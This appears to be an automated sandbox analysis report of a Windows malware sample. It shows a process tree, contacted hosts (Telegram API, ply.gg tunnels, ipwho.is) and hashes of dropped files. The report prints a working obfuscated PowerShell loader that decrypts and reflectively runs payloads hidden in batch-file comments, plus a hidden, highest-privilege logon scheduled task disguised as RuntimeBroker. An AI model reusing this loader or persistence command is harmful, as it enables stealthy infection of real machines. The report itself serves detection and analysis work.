Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4040 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4040 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 3832 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 3832 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 4984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1932 wrote to memory of 4984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4984 wrote to memory of 3264 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4984 wrote to memory of 3264 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3264 wrote to memory of 4516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3264 wrote to memory of 4516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4516 wrote to memory of 4872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4516 wrote to memory of 4872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4872 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4872 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 1376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 1376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 4696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 600 wrote to memory of 4696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4696 wrote to memory of 1748 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4696 wrote to memory of 1748 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1748 wrote to memory of 3956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 3956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModXPack.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModXPack.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_814_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_814.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_814.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_814.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_814.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_814.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ModPack.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_358_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_358.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_358.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_358.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_358.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_358.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.7.6.8.0.7.2.8.3.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 china-earth.gl.at.ply.gg udp
US 147.185.221.19:14568 china-earth.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 notes-creation.gl.at.ply.gg udp
US 147.185.221.19:27030 notes-creation.gl.at.ply.gg tcp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:443 ipwho.is tcp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/1932-4-0x0000017AD83F0000-0x0000017AD8412000-memory.dmp

memory/1932-7-0x0000017AD85A0000-0x0000017AD8616000-memory.dmp

memory/1932-8-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/1932-9-0x0000017AD82B0000-0x0000017AD82C0000-memory.dmp

memory/1932-10-0x0000017AD82B0000-0x0000017AD82C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2wtqtarg.lyt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1932-21-0x0000017AD82B0000-0x0000017AD82C0000-memory.dmp

memory/1932-26-0x0000017AD8550000-0x0000017AD8558000-memory.dmp

memory/1932-27-0x0000017AD8860000-0x0000017AD8A02000-memory.dmp

memory/3832-36-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/3832-38-0x0000029CAAFF0000-0x0000029CAB000000-memory.dmp

memory/3832-39-0x0000029CAAFF0000-0x0000029CAB000000-memory.dmp

memory/3832-54-0x0000029CAAFF0000-0x0000029CAB000000-memory.dmp

memory/3832-69-0x0000029CAAFF0000-0x0000029CAB000000-memory.dmp

memory/3832-73-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f45bad28bfc59e679ff291d807779e54
SHA1 4743408f9529733b71f8859a6a396eb87eabed23
SHA256 51df79556153f93c6640a441ac4d416d916056b7bdaec11a35d43dc2b4ca2aac
SHA512 960072afd129f4faef1f38771ad1eb737e582c1eacef6537d9323c75948f55fbddca0c0f73b47e30495fe047ddfbf6aab17acf9d2546316bec141244a21982a6

C:\Users\Admin\AppData\Roaming\startup_str_814.vbs

MD5 723f0cfcb01b09604416e4b4ecd29a80
SHA1 dea4fc842041133cef8c0d1760bffd30bac7fb7e
SHA256 8c785d4441b59920cb35b2307eab9132d65c6f2320dcac5d7879ef64cfc2086b
SHA512 e4ef5c4486b67e9d66d9c143cf91221a71e1c037859e7580b80b19ec3e4bb0051bca577b0d2dbad609fa5b34b650fab00ecb5e20b0f6171c638fec697d1f2806

C:\Users\Admin\AppData\Roaming\startup_str_814.bat

MD5 51d7b8be303abf43851e767d9250887b
SHA1 e795e381647c8a99529f87810347881b6b9bdeba
SHA256 e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d
SHA512 1ee6999e72bafb69559c1dbeb6ff84e46f94fe1b51a82626d7feabce5619053299872d680520aac791e103a3fb45a6d002180cc166215c59517e6c72dae6ee26

memory/4516-90-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/4516-91-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp

memory/4516-93-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp

memory/1932-94-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/4516-109-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp

memory/4516-115-0x0000028EBFD00000-0x0000028EBFD0E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ModPack.bat

MD5 105f33324f5807a250699b78a8972954
SHA1 c7e43ef81256e582a290a84a387a2163e35de9fb
SHA256 636bf2c51b857661bf1125085ee11bc28cf2d8f2cdaa5d44135dd8d87a52a4b5
SHA512 162dabf9630be54a2c6775d9f928be6923462b211d9072752341bcdaeae8099b0d49b6710bedd13f894cc72742336728365b44e8f282622487d11fcc9cdc7101

memory/600-129-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/600-130-0x00000217CD140000-0x00000217CD150000-memory.dmp

memory/600-131-0x00000217CD140000-0x00000217CD150000-memory.dmp

memory/600-144-0x00000217CD140000-0x00000217CD150000-memory.dmp

memory/600-149-0x00000217CD420000-0x00000217CD428000-memory.dmp

memory/600-150-0x00000217CD730000-0x00000217CD862000-memory.dmp

memory/1376-160-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/1376-161-0x000001D17CED0000-0x000001D17CEE0000-memory.dmp

memory/4516-162-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/1376-164-0x000001D17CED0000-0x000001D17CEE0000-memory.dmp

memory/1376-178-0x000001D17CED0000-0x000001D17CEE0000-memory.dmp

memory/1376-195-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9a23d42415a265d33ff202c8a5d27cb0
SHA1 8628830b4d68669de80bb16ea3ead90758f3fcd8
SHA256 18ca45333ca6560f367d8a00d2d8551f3920e63718c6b0bae5d034c5cca766ea
SHA512 1d772e0441603d03e0f4301db7962e80fa1bde93eb76c76e9f26726f34778af915ae22faea0c8cec532528af9157b696cfb26c3a68af45e3513fae6b678e3ac0

C:\Users\Admin\AppData\Roaming\startup_str_358.vbs

MD5 e38f413342ebf7d2fc4b12d2acd8b0ac
SHA1 02cd62b28941e57f85ee1900506581cf72b97a5a
SHA256 04f9b8eed35f17a3c4fc423fb81a9a45b035b7121f9c3ff883ef8d05241722f3
SHA512 9e57944317a9bbf81fbe40993d6c65f85c76b07dbb909db5800ce3895445525924783b7635b4218597adafc3d6e96174de5cc925fceaf95a0c88da2c0091360c

memory/600-208-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/3956-213-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/4516-214-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp

memory/3956-215-0x0000021B72720000-0x0000021B72730000-memory.dmp

memory/3956-216-0x0000021B72720000-0x0000021B72730000-memory.dmp

memory/4516-217-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp

memory/3956-232-0x0000021B72720000-0x0000021B72730000-memory.dmp

memory/3956-236-0x0000021B72E50000-0x0000021B73174000-memory.dmp

memory/3956-238-0x0000021B736E0000-0x0000021B73730000-memory.dmp

memory/3956-239-0x0000021B73AE0000-0x0000021B73B92000-memory.dmp

memory/3956-240-0x0000021B73D70000-0x0000021B73F32000-memory.dmp

memory/3956-244-0x0000021B73860000-0x0000021B73872000-memory.dmp

memory/3956-245-0x0000021B73BE0000-0x0000021B73C1E000-memory.dmp

memory/3956-252-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/3956-253-0x0000021B72720000-0x0000021B72730000-memory.dmp